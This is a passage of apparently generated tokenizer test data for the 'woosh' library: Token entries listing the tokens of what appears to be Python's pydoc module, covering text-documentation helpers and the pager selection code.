woosh.Token(woosh.NEWLINE, '\r\n', 1496, 40, 1497, 0),
woosh.Token(woosh.NAME, 'if', 1497, 16, 1497, 18),
woosh.Token(woosh.NAME, 'realname', 1497, 19, 1497, 27),
woosh.Token(woosh.OP, '==', 1497, 28, 1497, 30),
woosh.Token(woosh.STRING, "'<lambda>'", 1497, 31, 1497, 41),
woosh.Token(woosh.OP, ':', 1497, 41, 1497, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1497, 42, 1498, 0),
woosh.Token(woosh.INDENT, ' ', 1498, 0, 1498, 20),
woosh.Token(woosh.NAME, 'title', 1498, 20, 1498, 25),
woosh.Token(woosh.OP, '=', 1498, 26, 1498, 27),
woosh.Token(woosh.NAME, 'self', 1498, 28, 1498, 32),
woosh.Token(woosh.OP, '.', 1498, 32, 1498, 33),
woosh.Token(woosh.NAME, 'bold', 1498, 33, 1498, 37),
woosh.Token(woosh.OP, '(', 1498, 37, 1498, 38),
woosh.Token(woosh.NAME, 'name', 1498, 38, 1498, 42),
woosh.Token(woosh.OP, ')', 1498, 42, 1498, 43),
woosh.Token(woosh.OP, '+', 1498, 44, 1498, 45),
woosh.Token(woosh.STRING, "' lambda '", 1498, 46, 1498, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 1498, 56, 1499, 0),
woosh.Token(woosh.COMMENT, "# XXX lambda's won't usually have func_annotations['return']", 1499, 20, 1499, 80),
woosh.Token(woosh.COMMENT, "# since the syntax doesn't support but it is possible.", 1500, 20, 1500, 74),
woosh.Token(woosh.COMMENT, "# So removing parentheses isn't truly safe.", 1501, 20, 1501, 63),
woosh.Token(woosh.NAME, 'argspec', 1502, 20, 1502, 27),
woosh.Token(woosh.OP, '=', 1502, 28, 1502, 29),
woosh.Token(woosh.NAME, 'argspec', 1502, 30, 1502, 37),
woosh.Token(woosh.OP, '[', 1502, 37, 1502, 38),
woosh.Token(woosh.NUMBER, '1', 1502, 38, 1502, 39),
woosh.Token(woosh.OP, ':', 1502, 39, 1502, 40),
woosh.Token(woosh.OP, '-', 1502, 40, 1502, 41),
woosh.Token(woosh.NUMBER, '1', 1502, 41, 1502, 42),
woosh.Token(woosh.OP, ']', 1502, 42, 1502, 43),
woosh.Token(woosh.COMMENT, '# remove parentheses', 1502, 44, 1502, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 1502, 64, 1503, 0),
woosh.Token(woosh.DEDENT, ' ', 1503, 0, 1503, 8),
woosh.Token(woosh.DEDENT, '', 1503, 8, 1503, 8),
woosh.Token(woosh.DEDENT, '', 1503, 8, 1503, 8),
woosh.Token(woosh.NAME, 'if', 1503, 8, 1503, 10),
woosh.Token(woosh.NAME, 'not', 1503, 11, 1503, 14),
woosh.Token(woosh.NAME, 'argspec', 1503, 15, 1503, 22),
woosh.Token(woosh.OP, ':', 1503, 22, 1503, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1503, 23, 1504, 0),
woosh.Token(woosh.INDENT, ' ', 1504, 0, 1504, 12),
woosh.Token(woosh.NAME, 'argspec', 1504, 12, 1504, 19),
woosh.Token(woosh.OP, '=', 1504, 20, 1504, 21),
woosh.Token(woosh.STRING, "'(...)'", 1504, 22, 1504, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1504, 29, 1505, 0),
woosh.Token(woosh.DEDENT, ' ', 1505, 0, 1505, 8),
woosh.Token(woosh.NAME, 'decl', 1505, 8, 1505, 12),
woosh.Token(woosh.OP, '=', 1505, 13, 1505, 14),
woosh.Token(woosh.NAME, 'asyncqualifier', 1505, 15, 1505, 29),
woosh.Token(woosh.OP, '+', 1505, 30, 1505, 31),
woosh.Token(woosh.NAME, 'title', 1505, 32, 1505, 37),
woosh.Token(woosh.OP, '+', 1505, 38, 1505, 39),
woosh.Token(woosh.NAME, 'argspec', 1505, 40, 1505, 47),
woosh.Token(woosh.OP, '+', 1505, 48, 1505, 49),
woosh.Token(woosh.NAME, 'note', 1505, 50, 1505, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 1505, 54, 1506, 0),
woosh.Token(woosh.NAME, 'if', 1507, 8, 1507, 10),
woosh.Token(woosh.NAME, 'skipdocs', 1507, 11, 1507, 19),
woosh.Token(woosh.OP, ':', 1507, 19, 1507, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1507, 20, 1508, 0),
woosh.Token(woosh.INDENT, ' ', 1508, 0, 1508, 12),
woosh.Token(woosh.NAME, 'return', 1508, 12, 1508, 18),
woosh.Token(woosh.NAME, 'decl', 1508, 19, 1508, 23),
woosh.Token(woosh.OP, '+', 1508, 24, 1508, 25),
woosh.Token(woosh.STRING, "'\\n'", 1508, 26, 1508, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1508, 30, 1509, 0),
woosh.Token(woosh.DEDENT, ' ', 1509, 0, 1509, 8),
woosh.Token(woosh.NAME, 'else', 1509, 8, 1509, 12),
woosh.Token(woosh.OP, ':', 1509, 12, 1509, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1509, 13, 1510, 0),
woosh.Token(woosh.INDENT, ' ', 1510, 0, 1510, 12),
woosh.Token(woosh.NAME, 'doc', 1510, 12, 1510, 15),
woosh.Token(woosh.OP, '=', 1510, 16, 1510, 17),
woosh.Token(woosh.NAME, 'getdoc', 1510, 18, 1510, 24),
woosh.Token(woosh.OP, '(', 1510, 24, 1510, 25),
woosh.Token(woosh.NAME, 'object', 1510, 25, 1510, 31),
woosh.Token(woosh.OP, ')', 1510, 31, 1510, 32),
woosh.Token(woosh.NAME, 'or', 1510, 33, 1510, 35),
woosh.Token(woosh.STRING, "''", 1510, 36, 1510, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1510, 38, 1511, 0),
woosh.Token(woosh.NAME, 'return', 1511, 12, 1511, 18),
woosh.Token(woosh.NAME, 'decl', 1511, 19, 1511, 23),
woosh.Token(woosh.OP, '+', 1511, 24, 1511, 25),
woosh.Token(woosh.STRING, "'\\n'", 1511, 26, 1511, 30),
woosh.Token(woosh.OP, '+', 1511, 31, 1511, 32),
woosh.Token(woosh.OP, '(', 1511, 33, 1511, 34),
woosh.Token(woosh.NAME, 'doc', 1511, 34, 1511, 37),
woosh.Token(woosh.NAME, 'and', 1511, 38, 1511, 41),
woosh.Token(woosh.NAME, 'self', 1511, 42, 1511, 46),
woosh.Token(woosh.OP, '.', 1511, 46, 1511, 47),
woosh.Token(woosh.NAME, 'indent', 1511, 47, 1511, 53),
woosh.Token(woosh.OP, '(', 1511, 53, 1511, 54),
woosh.Token(woosh.NAME, 'doc', 1511, 54, 1511, 57),
woosh.Token(woosh.OP, ')', 1511, 57, 1511, 58),
woosh.Token(woosh.OP, '.', 1511, 58, 1511, 59),
woosh.Token(woosh.NAME, 'rstrip', 1511, 59, 1511, 65),
woosh.Token(woosh.OP, '(', 1511, 65, 1511, 66),
woosh.Token(woosh.OP, ')', 1511, 66, 1511, 67),
woosh.Token(woosh.OP, '+', 1511, 68, 1511, 69),
woosh.Token(woosh.STRING, "'\\n'", 1511, 70, 1511, 74),
woosh.Token(woosh.OP, ')', 1511, 74, 1511, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 1511, 75, 1512, 0),
woosh.Token(woosh.DEDENT, ' ', 1513, 0, 1513, 4),
woosh.Token(woosh.DEDENT, '', 1513, 4, 1513, 4),
woosh.Token(woosh.NAME, 'def', 1513, 4, 1513, 7),
woosh.Token(woosh.NAME, 'docdata', 1513, 8, 1513, 15),
woosh.Token(woosh.OP, '(', 1513, 15, 1513, 16),
woosh.Token(woosh.NAME, 'self', 1513, 16, 1513, 20),
woosh.Token(woosh.OP, ',', 1513, 20, 1513, 21),
woosh.Token(woosh.NAME, 'object', 1513, 22, 1513, 28),
woosh.Token(woosh.OP, ',', 1513, 28, 1513, 29),
woosh.Token(woosh.NAME, 'name', 1513, 30, 1513, 34),
woosh.Token(woosh.OP, '=', 1513, 34, 1513, 35),
woosh.Token(woosh.NAME, 'None', 1513, 35, 1513, 39),
woosh.Token(woosh.OP, ',', 1513, 39, 1513, 40),
woosh.Token(woosh.NAME, 'mod', 1513, 41, 1513, 44),
woosh.Token(woosh.OP, '=', 1513, 44, 1513, 45),
woosh.Token(woosh.NAME, 'None', 1513, 45, 1513, 49),
woosh.Token(woosh.OP, ',', 1513, 49, 1513, 50),
woosh.Token(woosh.NAME, 'cl', 1513, 51, 1513, 53),
woosh.Token(woosh.OP, '=', 1513, 53, 1513, 54),
woosh.Token(woosh.NAME, 'None', 1513, 54, 1513, 58),
woosh.Token(woosh.OP, ')', 1513, 58, 1513, 59),
woosh.Token(woosh.OP, ':', 1513, 59, 1513, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 1513, 60, 1514, 0),
woosh.Token(woosh.INDENT, ' ', 1514, 0, 1514, 8),
woosh.Token(woosh.STRING, '"""Produce text documentation for a data descriptor."""', 1514, 8, 1514, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 1514, 63, 1515, 0),
woosh.Token(woosh.NAME, 'results', 1515, 8, 1515, 15),
woosh.Token(woosh.OP, '=', 1515, 16, 1515, 17),
woosh.Token(woosh.OP, '[', 1515, 18, 1515, 19),
woosh.Token(woosh.OP, ']', 1515, 19, 1515, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1515, 20, 1516, 0),
woosh.Token(woosh.NAME, 'push', 1516, 8, 1516, 12),
woosh.Token(woosh.OP, '=', 1516, 13, 1516, 14),
woosh.Token(woosh.NAME, 'results', 1516, 15, 1516, 22),
woosh.Token(woosh.OP, '.', 1516, 22, 1516, 23),
woosh.Token(woosh.NAME, 'append', 1516, 23, 1516, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1516, 29, 1517, 0),
woosh.Token(woosh.NAME, 'if', 1518, 8, 1518, 10),
woosh.Token(woosh.NAME, 'name', 1518, 11, 1518, 15),
woosh.Token(woosh.OP, ':', 1518, 15, 1518, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1518, 16, 1519, 0),
woosh.Token(woosh.INDENT, ' ', 1519, 0, 1519, 12),
woosh.Token(woosh.NAME, 'push', 1519, 12, 1519, 16),
woosh.Token(woosh.OP, '(', 1519, 16, 1519, 17),
woosh.Token(woosh.NAME, 'self', 1519, 17, 1519, 21),
woosh.Token(woosh.OP, '.', 1519, 21, 1519, 22),
woosh.Token(woosh.NAME, 'bold', 1519, 22, 1519, 26),
woosh.Token(woosh.OP, '(', 1519, 26, 1519, 27),
woosh.Token(woosh.NAME, 'name', 1519, 27, 1519, 31),
woosh.Token(woosh.OP, ')', 1519, 31, 1519, 32),
woosh.Token(woosh.OP, ')', 1519, 32, 1519, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 1519, 33, 1520, 0),
woosh.Token(woosh.NAME, 'push', 1520, 12, 1520, 16),
woosh.Token(woosh.OP, '(', 1520, 16, 1520, 17),
woosh.Token(woosh.STRING, "'\\n'", 1520, 17, 1520, 21),
woosh.Token(woosh.OP, ')', 1520, 21, 1520, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 1520, 22, 1521, 0),
woosh.Token(woosh.DEDENT, ' ', 1521, 0, 1521, 8),
woosh.Token(woosh.NAME, 'doc', 1521, 8, 1521, 11),
woosh.Token(woosh.OP, '=', 1521, 12, 1521, 13),
woosh.Token(woosh.NAME, 'getdoc', 1521, 14, 1521, 20),
woosh.Token(woosh.OP, '(', 1521, 20, 1521, 21),
woosh.Token(woosh.NAME, 'object', 1521, 21, 1521, 27),
woosh.Token(woosh.OP, ')', 1521, 27, 1521, 28),
woosh.Token(woosh.NAME, 'or', 1521, 29, 1521, 31),
woosh.Token(woosh.STRING, "''", 1521, 32, 1521, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 1521, 34, 1522, 0),
woosh.Token(woosh.NAME, 'if', 1522, 8, 1522, 10),
woosh.Token(woosh.NAME, 'doc', 1522, 11, 1522, 14),
woosh.Token(woosh.OP, ':', 1522, 14, 1522, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 1522, 15, 1523, 0),
woosh.Token(woosh.INDENT, ' ', 1523, 0, 1523, 12),
woosh.Token(woosh.NAME, 'push', 1523, 12, 1523, 16),
woosh.Token(woosh.OP, '(', 1523, 16, 1523, 17),
woosh.Token(woosh.NAME, 'self', 1523, 17, 1523, 21),
woosh.Token(woosh.OP, '.', 1523, 21, 1523, 22),
woosh.Token(woosh.NAME, 'indent', 1523, 22, 1523, 28),
woosh.Token(woosh.OP, '(', 1523, 28, 1523, 29),
woosh.Token(woosh.NAME, 'doc', 1523, 29, 1523, 32),
woosh.Token(woosh.OP, ')', 1523, 32, 1523, 33),
woosh.Token(woosh.OP, ')', 1523, 33, 1523, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 1523, 34, 1524, 0),
woosh.Token(woosh.NAME, 'push', 1524, 12, 1524, 16),
woosh.Token(woosh.OP, '(', 1524, 16, 1524, 17),
woosh.Token(woosh.STRING, "'\\n'", 1524, 17, 1524, 21),
woosh.Token(woosh.OP, ')', 1524, 21, 1524, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 1524, 22, 1525, 0),
woosh.Token(woosh.DEDENT, ' ', 1525, 0, 1525, 8),
woosh.Token(woosh.NAME, 'return', 1525, 8, 1525, 14),
woosh.Token(woosh.STRING, "''", 1525, 15, 1525, 17),
woosh.Token(woosh.OP, '.', 1525, 17, 1525, 18),
woosh.Token(woosh.NAME, 'join', 1525, 18, 1525, 22),
woosh.Token(woosh.OP, '(', 1525, 22, 1525, 23),
woosh.Token(woosh.NAME, 'results', 1525, 23, 1525, 30),
woosh.Token(woosh.OP, ')', 1525, 30, 1525, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1525, 31, 1526, 0),
woosh.Token(woosh.DEDENT, ' ', 1527, 0, 1527, 4),
woosh.Token(woosh.NAME, 'docproperty', 1527, 4, 1527, 15),
woosh.Token(woosh.OP, '=', 1527, 16, 1527, 17),
woosh.Token(woosh.NAME, 'docdata', 1527, 18, 1527, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1527, 25, 1528, 0),
woosh.Token(woosh.NAME, 'def', 1529, 4, 1529, 7),
woosh.Token(woosh.NAME, 'docother', 1529, 8, 1529, 16),
woosh.Token(woosh.OP, '(', 1529, 16, 1529, 17),
woosh.Token(woosh.NAME, 'self', 1529, 17, 1529, 21),
woosh.Token(woosh.OP, ',', 1529, 21, 1529, 22),
woosh.Token(woosh.NAME, 'object', 1529, 23, 1529, 29),
woosh.Token(woosh.OP, ',', 1529, 29, 1529, 30),
woosh.Token(woosh.NAME, 'name', 1529, 31, 1529, 35),
woosh.Token(woosh.OP, '=', 1529, 35, 1529, 36),
woosh.Token(woosh.NAME, 'None', 1529, 36, 1529, 40),
woosh.Token(woosh.OP, ',', 1529, 40, 1529, 41),
woosh.Token(woosh.NAME, 'mod', 1529, 42, 1529, 45),
woosh.Token(woosh.OP, '=', 1529, 45, 1529, 46),
woosh.Token(woosh.NAME, 'None', 1529, 46, 1529, 50),
woosh.Token(woosh.OP, ',', 1529, 50, 1529, 51),
woosh.Token(woosh.NAME, 'parent', 1529, 52, 1529, 58),
woosh.Token(woosh.OP, '=', 1529, 58, 1529, 59),
woosh.Token(woosh.NAME, 'None', 1529, 59, 1529, 63),
woosh.Token(woosh.OP, ',', 1529, 63, 1529, 64),
woosh.Token(woosh.NAME, 'maxlen', 1529, 65, 1529, 71),
woosh.Token(woosh.OP, '=', 1529, 71, 1529, 72),
woosh.Token(woosh.NAME, 'None', 1529, 72, 1529, 76),
woosh.Token(woosh.OP, ',', 1529, 76, 1529, 77),
woosh.Token(woosh.NAME, 'doc', 1529, 78, 1529, 81),
woosh.Token(woosh.OP, '=', 1529, 81, 1529, 82),
woosh.Token(woosh.NAME, 'None', 1529, 82, 1529, 86),
woosh.Token(woosh.OP, ')', 1529, 86, 1529, 87),
woosh.Token(woosh.OP, ':', 1529, 87, 1529, 88),
woosh.Token(woosh.NEWLINE, '\r\n', 1529, 88, 1530, 0),
woosh.Token(woosh.INDENT, ' ', 1530, 0, 1530, 8),
woosh.Token(woosh.STRING, '"""Produce text documentation for a data object."""', 1530, 8, 1530, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 1530, 59, 1531, 0),
woosh.Token(woosh.NAME, 'repr', 1531, 8, 1531, 12),
woosh.Token(woosh.OP, '=', 1531, 13, 1531, 14),
woosh.Token(woosh.NAME, 'self', 1531, 15, 1531, 19),
woosh.Token(woosh.OP, '.', 1531, 19, 1531, 20),
woosh.Token(woosh.NAME, 'repr', 1531, 20, 1531, 24),
woosh.Token(woosh.OP, '(', 1531, 24, 1531, 25),
woosh.Token(woosh.NAME, 'object', 1531, 25, 1531, 31),
woosh.Token(woosh.OP, ')', 1531, 31, 1531, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1531, 32, 1532, 0),
woosh.Token(woosh.NAME, 'if', 1532, 8, 1532, 10),
woosh.Token(woosh.NAME, 'maxlen', 1532, 11, 1532, 17),
woosh.Token(woosh.OP, ':', 1532, 17, 1532, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1532, 18, 1533, 0),
woosh.Token(woosh.INDENT, ' ', 1533, 0, 1533, 12),
woosh.Token(woosh.NAME, 'line', 1533, 12, 1533, 16),
woosh.Token(woosh.OP, '=', 1533, 17, 1533, 18),
woosh.Token(woosh.OP, '(', 1533, 19, 1533, 20),
woosh.Token(woosh.NAME, 'name', 1533, 20, 1533, 24),
woosh.Token(woosh.NAME, 'and', 1533, 25, 1533, 28),
woosh.Token(woosh.NAME, 'name', 1533, 29, 1533, 33),
woosh.Token(woosh.OP, '+', 1533, 34, 1533, 35),
woosh.Token(woosh.STRING, "' = '", 1533, 36, 1533, 41),
woosh.Token(woosh.NAME, 'or', 1533, 42, 1533, 44),
woosh.Token(woosh.STRING, "''", 1533, 45, 1533, 47),
woosh.Token(woosh.OP, ')', 1533, 47, 1533, 48),
woosh.Token(woosh.OP, '+', 1533, 49, 1533, 50),
woosh.Token(woosh.NAME, 'repr', 1533, 51, 1533, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1533, 55, 1534, 0),
woosh.Token(woosh.NAME, 'chop', 1534, 12, 1534, 16),
woosh.Token(woosh.OP, '=', 1534, 17, 1534, 18),
woosh.Token(woosh.NAME, 'maxlen', 1534, 19, 1534, 25),
woosh.Token(woosh.OP, '-', 1534, 26, 1534, 27),
woosh.Token(woosh.NAME, 'len', 1534, 28, 1534, 31),
woosh.Token(woosh.OP, '(', 1534, 31, 1534, 32),
woosh.Token(woosh.NAME, 'line', 1534, 32, 1534, 36),
woosh.Token(woosh.OP, ')', 1534, 36, 1534, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 1534, 37, 1535, 0),
woosh.Token(woosh.NAME, 'if', 1535, 12, 1535, 14),
woosh.Token(woosh.NAME, 'chop', 1535, 15, 1535, 19),
woosh.Token(woosh.OP, '<', 1535, 20, 1535, 21),
woosh.Token(woosh.NUMBER, '0', 1535, 22, 1535, 23),
woosh.Token(woosh.OP, ':', 1535, 23, 1535, 24),
woosh.Token(woosh.NAME, 'repr', 1535, 25, 1535, 29),
woosh.Token(woosh.OP, '=', 1535, 30, 1535, 31),
woosh.Token(woosh.NAME, 'repr', 1535, 32, 1535, 36),
woosh.Token(woosh.OP, '[', 1535, 36, 1535, 37),
woosh.Token(woosh.OP, ':', 1535, 37, 1535, 38),
woosh.Token(woosh.NAME, 'chop', 1535, 38, 1535, 42),
woosh.Token(woosh.OP, ']', 1535, 42, 1535, 43),
woosh.Token(woosh.OP, '+', 1535, 44, 1535, 45),
woosh.Token(woosh.STRING, "'...'", 1535, 46, 1535, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 1535, 51, 1536, 0),
woosh.Token(woosh.DEDENT, ' ', 1536, 0, 1536, 8),
woosh.Token(woosh.NAME, 'line', 1536, 8, 1536, 12),
woosh.Token(woosh.OP, '=', 1536, 13, 1536, 14),
woosh.Token(woosh.OP, '(', 1536, 15, 1536, 16),
woosh.Token(woosh.NAME, 'name', 1536, 16, 1536, 20),
woosh.Token(woosh.NAME, 'and', 1536, 21, 1536, 24),
woosh.Token(woosh.NAME, 'self', 1536, 25, 1536, 29),
woosh.Token(woosh.OP, '.', 1536, 29, 1536, 30),
woosh.Token(woosh.NAME, 'bold', 1536, 30, 1536, 34),
woosh.Token(woosh.OP, '(', 1536, 34, 1536, 35),
woosh.Token(woosh.NAME, 'name', 1536, 35, 1536, 39),
woosh.Token(woosh.OP, ')', 1536, 39, 1536, 40),
woosh.Token(woosh.OP, '+', 1536, 41, 1536, 42),
woosh.Token(woosh.STRING, "' = '", 1536, 43, 1536, 48),
woosh.Token(woosh.NAME, 'or', 1536, 49, 1536, 51),
woosh.Token(woosh.STRING, "''", 1536, 52, 1536, 54),
woosh.Token(woosh.OP, ')', 1536, 54, 1536, 55),
woosh.Token(woosh.OP, '+', 1536, 56, 1536, 57),
woosh.Token(woosh.NAME, 'repr', 1536, 58, 1536, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 1536, 62, 1537, 0),
woosh.Token(woosh.NAME, 'if', 1537, 8, 1537, 10),
woosh.Token(woosh.NAME, 'not', 1537, 11, 1537, 14),
woosh.Token(woosh.NAME, 'doc', 1537, 15, 1537, 18),
woosh.Token(woosh.OP, ':', 1537, 18, 1537, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1537, 19, 1538, 0),
woosh.Token(woosh.INDENT, ' ', 1538, 0, 1538, 12),
woosh.Token(woosh.NAME, 'doc', 1538, 12, 1538, 15),
woosh.Token(woosh.OP, '=', 1538, 16, 1538, 17),
woosh.Token(woosh.NAME, 'getdoc', 1538, 18, 1538, 24),
woosh.Token(woosh.OP, '(', 1538, 24, 1538, 25),
woosh.Token(woosh.NAME, 'object', 1538, 25, 1538, 31),
woosh.Token(woosh.OP, ')', 1538, 31, 1538, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1538, 32, 1539, 0),
woosh.Token(woosh.DEDENT, ' ', 1539, 0, 1539, 8),
woosh.Token(woosh.NAME, 'if', 1539, 8, 1539, 10),
woosh.Token(woosh.NAME, 'doc', 1539, 11, 1539, 14),
woosh.Token(woosh.OP, ':', 1539, 14, 1539, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 1539, 15, 1540, 0),
woosh.Token(woosh.INDENT, ' ', 1540, 0, 1540, 12),
woosh.Token(woosh.NAME, 'line', 1540, 12, 1540, 16),
woosh.Token(woosh.OP, '+=', 1540, 17, 1540, 19),
woosh.Token(woosh.STRING, "'\\n'", 1540, 20, 1540, 24),
woosh.Token(woosh.OP, '+', 1540, 25, 1540, 26),
woosh.Token(woosh.NAME, 'self', 1540, 27, 1540, 31),
woosh.Token(woosh.OP, '.', 1540, 31, 1540, 32),
woosh.Token(woosh.NAME, 'indent', 1540, 32, 1540, 38),
woosh.Token(woosh.OP, '(', 1540, 38, 1540, 39),
woosh.Token(woosh.NAME, 'str', 1540, 39, 1540, 42),
woosh.Token(woosh.OP, '(', 1540, 42, 1540, 43),
woosh.Token(woosh.NAME, 'doc', 1540, 43, 1540, 46),
woosh.Token(woosh.OP, ')', 1540, 46, 1540, 47),
woosh.Token(woosh.OP, ')', 1540, 47, 1540, 48),
woosh.Token(woosh.OP, '+', 1540, 49, 1540, 50),
woosh.Token(woosh.STRING, "'\\n'", 1540, 51, 1540, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1540, 55, 1541, 0),
woosh.Token(woosh.DEDENT, ' ', 1541, 0, 1541, 8),
woosh.Token(woosh.NAME, 'return', 1541, 8, 1541, 14),
woosh.Token(woosh.NAME, 'line', 1541, 15, 1541, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1541, 19, 1542, 0),
woosh.Token(woosh.DEDENT, '', 1543, 0, 1543, 0),
woosh.Token(woosh.DEDENT, '', 1543, 0, 1543, 0),
woosh.Token(woosh.NAME, 'class', 1543, 0, 1543, 5),
woosh.Token(woosh.NAME, '_PlainTextDoc', 1543, 6, 1543, 19),
woosh.Token(woosh.OP, '(', 1543, 19, 1543, 20),
woosh.Token(woosh.NAME, 'TextDoc', 1543, 20, 1543, 27),
woosh.Token(woosh.OP, ')', 1543, 27, 1543, 28),
woosh.Token(woosh.OP, ':', 1543, 28, 1543, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1543, 29, 1544, 0),
woosh.Token(woosh.INDENT, ' ', 1544, 0, 1544, 4),
woosh.Token(woosh.STRING, '"""Subclass of TextDoc which overrides string styling"""', 1544, 4, 1544, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 1544, 60, 1545, 0),
woosh.Token(woosh.NAME, 'def', 1545, 4, 1545, 7),
woosh.Token(woosh.NAME, 'bold', 1545, 8, 1545, 12),
woosh.Token(woosh.OP, '(', 1545, 12, 1545, 13),
woosh.Token(woosh.NAME, 'self', 1545, 13, 1545, 17),
woosh.Token(woosh.OP, ',', 1545, 17, 1545, 18),
woosh.Token(woosh.NAME, 'text', 1545, 19, 1545, 23),
woosh.Token(woosh.OP, ')', 1545, 23, 1545, 24),
woosh.Token(woosh.OP, ':', 1545, 24, 1545, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1545, 25, 1546, 0),
woosh.Token(woosh.INDENT, ' ', 1546, 0, 1546, 8),
woosh.Token(woosh.NAME, 'return', 1546, 8, 1546, 14),
woosh.Token(woosh.NAME, 'text', 1546, 15, 1546, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1546, 19, 1547, 0),
woosh.Token(woosh.COMMENT, '# --------------------------------------------------------- user interfaces', 1548, 0, 1548, 75),
woosh.Token(woosh.DEDENT, '', 1550, 0, 1550, 0),
woosh.Token(woosh.DEDENT, '', 1550, 0, 1550, 0),
woosh.Token(woosh.NAME, 'def', 1550, 0, 1550, 3),
woosh.Token(woosh.NAME, 'pager', 1550, 4, 1550, 9),
woosh.Token(woosh.OP, '(', 1550, 9, 1550, 10),
woosh.Token(woosh.NAME, 'text', 1550, 10, 1550, 14),
woosh.Token(woosh.OP, ')', 1550, 14, 1550, 15),
woosh.Token(woosh.OP, ':', 1550, 15, 1550, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1550, 16, 1551, 0),
woosh.Token(woosh.INDENT, ' ', 1551, 0, 1551, 4),
woosh.Token(woosh.STRING, '"""The first time this is called, determine what kind of pager to use."""', 1551, 4, 1551, 77),
woosh.Token(woosh.NEWLINE, '\r\n', 1551, 77, 1552, 0),
woosh.Token(woosh.NAME, 'global', 1552, 4, 1552, 10),
woosh.Token(woosh.NAME, 'pager', 1552, 11, 1552, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1552, 16, 1553, 0),
woosh.Token(woosh.NAME, 'pager', 1553, 4, 1553, 9),
woosh.Token(woosh.OP, '=', 1553, 10, 1553, 11),
woosh.Token(woosh.NAME, 'getpager', 1553, 12, 1553, 20),
woosh.Token(woosh.OP, '(', 1553, 20, 1553, 21),
woosh.Token(woosh.OP, ')', 1553, 21, 1553, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 1553, 22, 1554, 0),
woosh.Token(woosh.NAME, 'pager', 1554, 4, 1554, 9),
woosh.Token(woosh.OP, '(', 1554, 9, 1554, 10),
woosh.Token(woosh.NAME, 'text', 1554, 10, 1554, 14),
woosh.Token(woosh.OP, ')', 1554, 14, 1554, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 1554, 15, 1555, 0),
woosh.Token(woosh.DEDENT, '', 1556, 0, 1556, 0),
woosh.Token(woosh.NAME, 'def', 1556, 0, 1556, 3),
woosh.Token(woosh.NAME, 'getpager', 1556, 4, 1556, 12),
woosh.Token(woosh.OP, '(', 1556, 12, 1556, 13),
woosh.Token(woosh.OP, ')', 1556, 13, 1556, 14),
woosh.Token(woosh.OP, ':', 1556, 14, 1556, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 1556, 15, 1557, 0),
woosh.Token(woosh.INDENT, ' ', 1557, 0, 1557, 4),
woosh.Token(woosh.STRING, '"""Decide what method to use for paging through text."""', 1557, 4, 1557, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 1557, 60, 1558, 0),
woosh.Token(woosh.NAME, 'if', 1558, 4, 1558, 6),
woosh.Token(woosh.NAME, 'not', 1558, 7, 1558, 10),
woosh.Token(woosh.NAME, 'hasattr', 1558, 11, 1558, 18),
woosh.Token(woosh.OP, '(', 1558, 18, 1558, 19),
woosh.Token(woosh.NAME, 'sys', 1558, 19, 1558, 22),
woosh.Token(woosh.OP, '.', 1558, 22, 1558, 23),
woosh.Token(woosh.NAME, 'stdin', 1558, 23, 1558, 28),
woosh.Token(woosh.OP, ',', 1558, 28, 1558, 29),
woosh.Token(woosh.STRING, '"isatty"', 1558, 30, 1558, 38),
woosh.Token(woosh.OP, ')', 1558, 38, 1558, 39),
woosh.Token(woosh.OP, ':', 1558, 39, 1558, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 1558, 40, 1559, 0),
woosh.Token(woosh.INDENT, ' ', 1559, 0, 1559, 8),
woosh.Token(woosh.NAME, 'return', 1559, 8, 1559, 14),
woosh.Token(woosh.NAME, 'plainpager', 1559, 15, 1559, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1559, 25, 1560, 0),
woosh.Token(woosh.DEDENT, ' ', 1560, 0, 1560, 4),
woosh.Token(woosh.NAME, 'if', 1560, 4, 1560, 6),
woosh.Token(woosh.NAME, 'not', 1560, 7, 1560, 10),
woosh.Token(woosh.NAME, 'hasattr', 1560, 11, 1560, 18),
woosh.Token(woosh.OP, '(', 1560, 18, 1560, 19),
woosh.Token(woosh.NAME, 'sys', 1560, 19, 1560, 22),
woosh.Token(woosh.OP, '.', 1560, 22, 1560, 23),
